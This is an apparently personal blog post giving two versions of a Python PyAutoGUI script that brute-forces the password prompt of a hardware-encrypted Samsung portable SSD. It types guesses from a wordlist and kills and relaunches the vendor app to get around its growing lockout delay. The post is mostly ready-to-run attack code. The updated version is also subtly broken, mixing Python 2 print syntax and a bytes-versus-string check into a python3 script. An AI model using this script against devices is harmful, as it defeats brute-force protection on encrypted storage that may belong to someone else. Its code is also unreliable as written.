Tuesday, August 9, 2016

Automatic GUI Password Dictionary Attack Using PyAutoGui

I had a Samsung Portable SSD that has hardware encryption. You need a separate driver app to recognize it being inserted into USB and then it automatically starts up the password prompt for you to login.

After some researching and prodding, there didn't seem to be any way to login over the command line so I was restricted to typing the text at the password prompt. boooooo. I couldn't even copy and paste into the window so I had to manually type every character. I decided to look into GUI automation to see if I could create a script that would automatically click and type for me. I found PyAutoGUI from google and automate the boring stuff and decided to implement it. The script is actually extremely simple:

#!/usr/local/bin/python3
import time
import pyautogui
import os

list =  ['password1','password2','password3','...']
count = 0
time.sleep(5) #give you time to click inside the app
samsung_drive_cmd = "/Users/USERNAMEHERE/Library/Application\ Support/PortableSSD/Samsung\ Portable\ SSD.app/Contents/MacOS/Samsung\ Portable\ SSD &"

for pwd in list:
  if count >= 6 * 2:
    os.system("killall 'Samsung Portable SSD'")
    os.system(samsung_drive_cmd)
    count = 0
    time.sleep(4)
  print("Trying %s" % pwd)
  pyautogui.moveTo(640, 405) #move to text box to enter password
  pyautogui.typewrite(pwd, interval=0.1) #enter password with .1s wait in between chars
  pyautogui.moveTo(670, 539) #move to "login" and click
  pyautogui.click() 
  count += 2 #every password attempt seems to add 2 seconds internally as a wait counter
  time.sleep(count)

The if statement inside the for loop kills the app and restarts (at 6 password tries) it so it resets the internal counter of the application. There is no reason to wait 20 seconds to enter the next password when you can just kill the app and start again with a fresh timer in 4 seconds.

In action:


Generate your password list using JTR, format into a list and let it run overnight. You cant really use your computer while this is running.

UPDATE:
I changed up my code a little bit to be more reliable, read the password from a file, detect when the password is correct and die at that time. Here is the updated and better code:

#!/usr/local/bin/python3
import time
import pyautogui
import os
import subprocess

wordlist = open('wordlist.txt','r')
list = wordlist.read().splitlines()

count = 0
time.sleep(5) #give you time to click inside the app
samsung_drive_cmd = "/Users/USERNAMEHERE/Library/Application\ Support/PortableSSD/Samsung\ Portable\ SSD.app/Contents/MacOS/Samsung\ Portable\ SSD &"

for pwd in list:
  if count >= 6 * 2:
    os.system("killall 'Samsung Portable SSD'")
    os.system(samsung_drive_cmd)
    count = 0
    time.sleep(4)
  mountlist = subprocess.check_output(["mount"])
  if "Samsung_T1" in mountlist:
    print 'THE DRIVE IS MOUNTED'
    exit()
  print("Trying %s" % pwd)
  pyautogui.moveTo(640, 405) #move to text box to enter password
  pyautogui.typewrite(pwd, interval=0.1) #enter password with .1s wait in between chars
  pyautogui.moveTo(670, 539) #move to "login" and click
  pyautogui.click() 
  count += 2 #every password attempt seems to add 2 seconds internally as a wait counter
  time.sleep(count)